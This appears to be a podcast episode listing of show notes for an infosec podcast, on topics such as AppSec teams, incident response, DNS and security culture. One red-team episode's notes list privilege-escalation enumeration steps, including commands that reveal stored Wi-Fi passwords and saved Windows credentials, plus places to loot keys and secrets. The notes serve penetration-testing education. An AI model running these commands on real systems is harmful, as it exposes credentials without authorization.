heck out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 15 Nov 2017 | 2017-038- Michael De Libero discusses building out your AppSec Team | 00:56:10 | |||||||||||||||||||||||||||||||
Direct Link: https://brakesec.com/2017-038
Michael De Libero spends his work hours running an application security team at a gaming development company. I (Bryan) was really impressed at the last NCC Group Quarterly meetup when he gave a talk (not recorded) about how to properly build out your Application Security Team. So I asked him on, and we went over the highlights of his talk. Some of the topics included: Discussing with management your manpower issues Who to include in your team Communication between teams
RSS: https://brakesec.com/BrakesecRSS Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Sign up at or DM us on Twitter, or email us. #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
----SHOW NOTES:
Amanda’s appearance on PSW
Building an AppSec Team - Michael de Libero (@noskillz)
https://techbeacon.com/owasp-top-ten-update-what-your-security-team-needs-know\
https://www.owasp.org/index.php/OWASP_AppSec_Pipeline
Need link to Michael’s slides -- https://docs.google.com/presentation/d/1Bvl2rybuWMdOu3cs03U85zwAvrM1RNxv99Dt-YiGiys/edit?usp=sharing
Random Notes from Mike:
How do you sell a company on having an appsec team if they don’t have one?
If you have an existing ‘security team’, how easily is it to augment that into an appsec team? Can you do job rotation with some devs? Do devs care enough to want to do code audits “That’s not in my job description”
Skills needed in an appsec team Does it depend on the tech used, or the tech you might use?
Internal security vs. consultants
Intro to RE course with Tyler Hudak
Bsides Wellington speaker Amanda Berlin | |||||||||||||||||||||||||||||||||
| 12 Sep 2017 | 2017-032-incident response tabletops, equifax breach | 00:47:38 | |||||||||||||||||||||||||||||||
Everyone should be doing incident response tabletops, even if it's not a dedicated task in your organization. It allows you to find out what you might be lacking in terms of processes, manpower, requirements, etc. This week, we discuss what you need to do to get ready for one, and how those should go in terms of helping your organization understand how to handle the aftermath. And in case you've been under a rock, #equifax was breached. 143 million credit records are in the ether. We discuss the facts as of 9 September 2017, and what this means to the average user. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-032-incident_response-equifax-done2.mp3
RSS: http://www.brakeingsecurity.com/rss Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw #iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2 #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team #iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---SHOW NOTES--- Incident response
Must go beyond ‘threats’. What is in your environment Struts aren’t a threat, or are they? Equifax didn’t think so at the time… Insider threat External entities Libraries plugins/themes used (Wordpress)
Risk analysis Qualitative Quantitative
What makes a good incident response exercise (
Following the creation and implementation of security controls around use cases, can be the testing of tabletop exercises and drills as a proof of concept. A tabletop exercise is a meeting of key stakeholders and staff that walk step by step through the mitigation of some type of disaster, malfunction, attack, or other emergency in a low stress situation. A drill is when staff carries out as many of the processes, procedures, and mitigations that would be performed during one of the emergencies as possible.
Derbycon channel on Slack Intro to RE class
https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax
| |||||||||||||||||||||||||||||||||
| 07 Sep 2019 | the last Derbycon Brakesec podcast | 00:50:43 | |||||||||||||||||||||||||||||||
This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, Gary Rimar (piano player Extraordinare) talks about @litmoose's talk on how to tell C-Levels that their applications aren't good.
We also got asked about how the show came about, and how we found each other.
**Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...** | |||||||||||||||||||||||||||||||||
| 27 Jul 2018 | 2018-026-insurers gathering data, netflix released a new DFIR tool, and google no longer gets phished? | 00:43:52 | |||||||||||||||||||||||||||||||
Stories and topics we covered: https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
| |||||||||||||||||||||||||||||||||
| 05 Nov 2018 | 2018-038-InfosecSherpa, security culture, | 00:59:12 | |||||||||||||||||||||||||||||||
@InfoSecSherpa
I have two talks coming up:
*Shameless Plug* My Nuzzel newsletters https://nuzzel.com/InfoSecSherpa/cybersecurity-africa News stories -
Biglaw Firm Hit With Cybersecurity Incident Earlier This Month (Published: 29 October 2018 | Source: Above the Law)
Porn-Watching Employee Infected Government Networks With Russian Malware, IG Says (Published: 25 October 2018 | Source: Next Gov)
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 25 Oct 2021 | 2021-038-Liz Saling, 5 pillars of building a good team | 01:07:18 | |||||||||||||||||||||||||||||||
Blog post that inspired this episode: https://lizsaling.com/SWE-team-five-pillars/
Liz Saling (@lizsaling) https://www.mindtools.com/pages/article/newLDR_86.htm http://www.mspguide.org/tool/tuckman-forming-norming-storming-performing https://michaelhyatt.com/3-roadblocks-to-avoid-for-optimal-team-performance Erin meyer is the one who did the netflix study! https://bigthink.com/the-present/high-performing-teams/ https://alicedartnell.com/blog/why-smart-goals-are-stupid/
NEWS: Unlocking ‘god’ mode on windows 11: https://www.bleepingcomputer.com/news/microsoft/how-to-unlock-windows-11s-god-mode-to-access-advanced-settings/ https://www.reddit.com/r/netsec/comments/q9f63y/creating_a_basic_python_reverse_shell_listener/ NFT malware (NFTs that empty wallets): https://www.theregister.com/2021/10/17/in_brief_security/ | |||||||||||||||||||||||||||||||||
| 15 Aug 2021 | 2021-029- incident response, PICERL cycle, showing value in IR, aligning with business goals -p1 | 00:40:08 | |||||||||||||||||||||||||||||||
https://blog.teamascend.com/6-phases-of-incident-response https://www.securitymetrics.com/blog/6-phases-incident-response-plan Recent vulnerabilities got Bryan thinking about incident response. Are organizations speedy enough to keep up? If the spate of vulns continue, what can we do to ensure we are dealing with the most important issues? How do we communicate those issues to management? How should we handle the workload? Testing of your IR costs money, do you have budget for that? (verodin, red-team) Restoring backups, extra VPC or azure environment Incidents occur You have to minimize issues, right? But is there a good way of doing that? Simplify your environment? Spend time working on the CIS 20? You gotta plan for that and show value vs effort.
Incident response is an ever changing landscape.
What is the goal of IR? Minimize damage Identify affected systems Recover gracefully and quickly? Does your environment allow for quick recovery? What does ‘return to normal’ look like? The goal of business Make money Incidents should just be considered part of doing business (risks) The more popular, the more likely the attack Incident timeframe = criteria for getting back to normal. PICERL is a cycle, and one of continual improvement. Incident response is not ‘one and done’. | |||||||||||||||||||||||||||||||||
| 27 Mar 2018 | 2018-010 - The ransoming of Atlanta, Facebook slurping PII, Dridex variants | 00:37:46 | |||||||||||||||||||||||||||||||
Matt Miller’s #Assembly and #Reverse #Engineering class $150USD for each class, 250USD for both classes Syllabus : https://docs.google.com/document/d/1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0/edit?usp=sharing Please state which class you'd like to take when ordering in the "Notes" field in Paypal https://paypal.me/BDSPodcast/150usd To sign up for both classes: https://paypal.me/BDSPodcast/250usd
Stories: https://threatpost.com/orbitz-warns-880000-payment-cards-suspected-stolen/130601/ TLS1.3 - https://www.theregister.co.uk/2018/03/27/with_tls_13_signed_off_its_implementation_time/ https://timtaubert.de/blog/2015/11/more-privacy-less-latency-improved-handshakes-in-tls-13
Sign up for Jay Beale's class at Black Hat 2018: https://www.blackhat.com/us-18/training/aikido-on-the-command-line-linux-lockdown-and-proactive-security.html #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 26 Jun 2018 | 2018-022-preventing_insider_threat | 00:47:32 | |||||||||||||||||||||||||||||||
After the recent Tesla insider threat event, BrakeSec decided to discuss some of the indicators of insider threat, what can be done to mitigate it, and why it happens.
news stories referenced: https://www.infosecurity-magazine.com/news/teslas-tough-lesson-on-malicious/
https://en.wikipedia.org/wiki/Insider_threat
https://en.wikipedia.org/wiki/Insider_threat_management
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 07 Mar 2016 | 2016-010-DNS_Reconnaissance | 00:49:54 | |||||||||||||||||||||||||||||||
DNS... we take it for granted... it's just there. And we only know it's broken when your boss can't get to Facebook. This week, we discuss the Domain Naming System (DNS). We start with a bit of history, talking about the origins of DNS, some of the RFCs involved in it's creation, how it's hierarchical structure functions to allow resolution to occur, and even why your /etc/hosts is important. We discuss some of the necessary fields in your DNS records. MX, ALIAS, CNAME, SOA, TXT, and how DNS is used for non-repudiation in email. We also touch on how you can use DNS to enumerate an external network presence when you are the red team, and what you should know about to make it harder for bad actors to not use your external DNS in amplification attacks. Finally, you can't have a discussion about DNS without talking about how to secure your DNS implementation. So we supply you with a few tips and best practices. Plenty of informational links down below, including links to the actual RFCs (Request for Comment) which detail how DNS is supposed to function. Think of them as the owner's manual for your car. Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-010-DNS_Reconnaissance.mp3 #iTunes: https://itunes.apple.com/us/podcast/2016-010-dns-reconnaissance/id799131292?i=364331694&mt=2 Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast RSS FEED: http://www.brakeingsecurity.com/rss
On #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969 Player.FM : https://player.fm/series/brakeing-down-security-podcast Stitcher Network: http://www.stitcher.com/s?fid= TuneIn Radio App: http://tunein.com/radio/
Podcast Links we used for information: http://www.slideshare.net/BizuworkkJemaneh/dns-42357401 300+ million domains registered: https://www.verisign.com/en_US/internet-technology-news/verisign-press-releases/articles/index.xhtml?artLink=aHR0cDovL3ZlcmlzaWduLm13bmV3c3Jvb20uY29tL2FydGljbGUvcnNzP2lkPTIwMTIwNTI%3D https://technet.microsoft.com/en-us/library/cc770432.aspx http://security-musings.blogspot.com/2013/03/building-secure-dns-infrastructure.html http://tldp.org/HOWTO/DNS-HOWTO-6.html https://en.wikipedia.org/wiki/Domain_Name_System https://en.wikipedia.org/wiki/DNS_spoofing http://www.esecurityplanet.com/network-security/how-to-prevent-dns-attacks.html http://www.thegeekstuff.com/2012/05/ettercap-tutorial/ https://support.google.com/a/answer/48090?hl=en http://www.ecsl.cs.sunysb.edu/tr/TR187.pdf https://tools.ietf.org/html/rfc882 https://tools.ietf.org/html/rfc883 https://tools.ietf.org/html/rfc1034 https://tools.ietf.org/html/rfc1035
| |||||||||||||||||||||||||||||||||
| 01 Jun 2020 | 2020-021- Derek Rook, redteam tactics, blue/redteam comms, and detection of testing | 01:17:03 | |||||||||||||||||||||||||||||||
**If Derek told you about us at SANS, send a DM to @brakeSec or email bds.podcast@gmail.com for an invite to our slack** OSCP/HtB/VulnHub is a game... designed to have a tester find a specific nugget of information to pivot or gain access to greater power on the system. Far different in the 'real' world.
Privilege escalation in Windows: *as of June 2020, many of these items still work, may not work completely in the future* *even so, many of these may not work if other mitigating controls are in place*
PENTEST METHODOLOGY : PTES -http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines OSSTMM - https://www.isecom.org/OSSTMM.3.pdf
Redteam methodology: https://www.synopsys.com/glossary/what-is-red-teaming.html
https://www.fuzzysecurity.com/tutorials/16.html
https://medium.com/@Shorty420/enumerating-ad-98e0821c4c78
Enumerate the machine Services Network connections Users Logins Domains Files Software installed (putty, git, MSO, etc) *older software may install with improper permissions* Service paths (along with users services are ran as) Windows Features (WSL, SSH, etc) Patch level (Build 1703, etc) Wifi networks and passwords (netsh wlan show profile <SSID> key=clear) Powershell history Bash History (if WSL is used) Incognito tokens Stored credentials (cmdkey /list) Powershell transcripts (search text files for "Windows PowerShell transcript start")
Context for above: Understand how the users make use of the system, and how they connect to other systems, follow those paths to find lateral movement, misconfigurations, etc. Each new system or user will provide further information to loot or avenues to explore
Linux EoP:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Enumeration Mostly the same as above Bash history or profile files Writable scripts (tampering with paths or environment variables) Setuid/Setgid binaries Sticky bit directories Crontabs Email spools World writable/readable files .ssh config files (keys, active sessions) Tmux/screen sessions Application secrets (database files, web files with database connectivity, hard coded creds or keys, etc) VPN profiles GNOME keyrings- https://askubuntu.com/questions/96798/where-does-seahorse-gnome-keyring-store-its-keyrings
Ways to defend against those kinds of EoP.
Something cool: https://www.youtube.com/playlist?playnext=1&list=PLnxNbFdr_l6sO6vR6Vx8sAJZKpgKtWaGX&feature=gws_kp_artist -- high Rollers
Derek is speaking at SANS SUMMIT happening on 04-05 June (FREE!) - https://www.sans.org/event/hackfest-ranges-summit-2020
Ms. Berlin is speaking at EDUCAUSE - VIRTUAL (04 June) https://www.educause.edu/
| |||||||||||||||||||||||||||||||||
| 10 Feb 2014 | Episode 5 - Interview with Frank Kim | 00:19:18 | |||||||||||||||||||||||||||||||
This week, we interviewed Frank Kim, an instructor from SANS, talks about developers methods, the challenges of getting developers to code securely, and the efforts to create a culture of secure coding. Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) | |||||||||||||||||||||||||||||||||
| 15 Dec 2016 | 2016-049-Amanda Berlin, the art of the sale, and Decision making trees | 00:56:47 | |||||||||||||||||||||||||||||||
"Always Be Closing" is the mantra that Alec Baldwin's character "Blake" intones in the movie "#GlenGarry #Glen #Ross". Ironically, the film about 4 men selling was a failure in the theaters. A lot of times as #blue #teamers, we find ourselves in the sights of a #sales person, or often enough, we are inviting them into our conference rooms to find out how their widget will help save the day. There's an art to the concept of selling, honed over the past 500,000 years, since Ugg tried to convince Oog that his wheel would revolutionize work... We asked Ms. Amanda Berlin (@infosystir) to join us this week, for her expertise at working at an security company, as well as someone who sells products, to discuss how and why sales and sales engineers do what they do. I posit that there must be 'decision tree' or script that most follow in an effort to make a sale, and how to confront the pushy sales pitch head on, or in Amanda's way, to avoid it altogether. We discuss Amanda's book she co-wrote with Lee Brotherston, whom we've had on our show before. Their #O'Reilly #book is on pre-sale right now, so you can order "The #Defensive #Security #Handbook" here: http://shop.oreilly.com/product/0636920051671.do Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-049-amanda_berlin_the_art_of_the_sale_decision_making_trees.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-049-amanda-berlin-art/id799131292?i=1000378988303&mt=2 Youtube: https://www.youtube.com/watch?v=v0llOSXfzBg
Special deal for our #BrakeSec Listeners:
| |||||||||||||||||||||||||||||||||
| 18 Dec 2023 | Brakesec Call to Action 2023 | 00:02:51 | |||||||||||||||||||||||||||||||
Youtube Video: https://youtu.be/IUDPlQaQg8M https://forms.gle/rf145MoN7cskwMjf8 Thank all of you for listening and for your input. RSS feed for the audio podcast is at https://www.brakeingsecurity.com/rss | |||||||||||||||||||||||||||||||||
| 20 May 2020 | 2020-019-Masha Sedova, customized training, phishing, ransomware, and privacy implications | 00:39:22 | |||||||||||||||||||||||||||||||
Masha Sedova - Founder, Elevate Security
Topic ideas from the PR company:
The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this new found knowledge.
Technology like vuln scanners or something more?
Motivation Theory (deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles
X&Y https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y
Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi
Masha’s suggested topics:
Why do security teams have difficulty in understanding their human risk today? What are the blockers?
What should security teams be measuring to get a holistic view of human risk?
What's the difference between security culture, security behavior change, and security awareness?
Is security culture a core capability in security defense? Why or why not?
Quantifying risk…
Is investing in human training a waste of time?
Phishing - mock phish or real phishing Pull data to see who is clicking on links Send an ‘intervention’
Gotta move away from training The ‘security team’ will save them…
https://www.ncsc.gov.uk/guidance/phishing
Books:
https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X
Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611
People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1
Deep thought: a Cybersecurity novela: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/
@modmasha Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 27 Apr 2021 | 2021-015-researchers knowingly add vulnerable code to linux kernel, @pageinsec joins us to discuss -part1 | 00:47:26 | |||||||||||||||||||||||||||||||
@pageinSec on Twitter
Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
Spencer Geitzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments
https://en.wikipedia.org/wiki/Milgram_experiment
https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh@linuxfoundation.org/
https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021
https://www.labbott.name/blog/2021/04/21/breakingtrust.html Seems like a number of patches were added (~190) and each had to be reviewed https://twitter.com/UMNComputerSci/status/1384948683821694976 response to researchers Linux Kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%2FTsbmcZzwnX@kroah.com/ https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/ https://twitter.com/SarahJamieLewis/status/1384871385537908736 @sarahJamieLewis shows the change they submitted in their paper: https://twitter.com/SarahJamieLewis/status/1384876050207940608 https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1 https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1 https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.) https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.) https://github.com/QiushiWu/qiushiwu.github.io NSF Grant application (thank you Page!) https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp Might be more recent - Human Subjects | NSF - National Science Foundation The researchers issued an apology today 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/ *thanks to Zach Whittacker’s security mailing list..*
Thought provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset? Co-author of : https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127
Introduction of bugs (meaningful or otherwise) caused more work for devs. Revert list of 190 patches (threaded): https://lkml.org/lkml/2021/4/21/454 Quick overview of using deception in research from Duke’s IRB: Using Deception in Research | Institutional Review Board (duke.edu) Is this better? Where’s the line on this? | |||||||||||||||||||||||||||||||||
| 24 Mar 2023 | Dish Network is still busted, John Deere avoiding OSS requests, Is DAST dead? | 01:29:37 | |||||||||||||||||||||||||||||||
| |||||||||||||||||||||||||||||||||
| 04 Apr 2018 | 2018-011: Creating a Culture of Neurodiversity | 01:10:36 | |||||||||||||||||||||||||||||||
Megan Roddie discusses being a High functioning Autistic, and we discuss how company and management can take advantage of the unique abilities of those with high functioning autism. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-011.mp3
Matt Miller's Assembly and Reverse Engineering Class: Still can sign up! The syllabus is here: https://drive.google.com/open?id=1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0
SHOW NOTES:
Link to Megan’s slides Megan Roddie (@megan_roddie
#Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 07 Aug 2022 | Amanda's Sysmon Talk -p1 | 00:37:13 | |||||||||||||||||||||||||||||||
This week Amanda, Brian, and Bryan discuss sysmon, how it works to detect IOCs in your org, and how it extends beyond regular Windows event monitoring.
oh... and it's available for Linux too! BrakeSec is: https://www.brakeingsecurity.com
Our #twitch stream can be found at: | |||||||||||||||||||||||||||||||||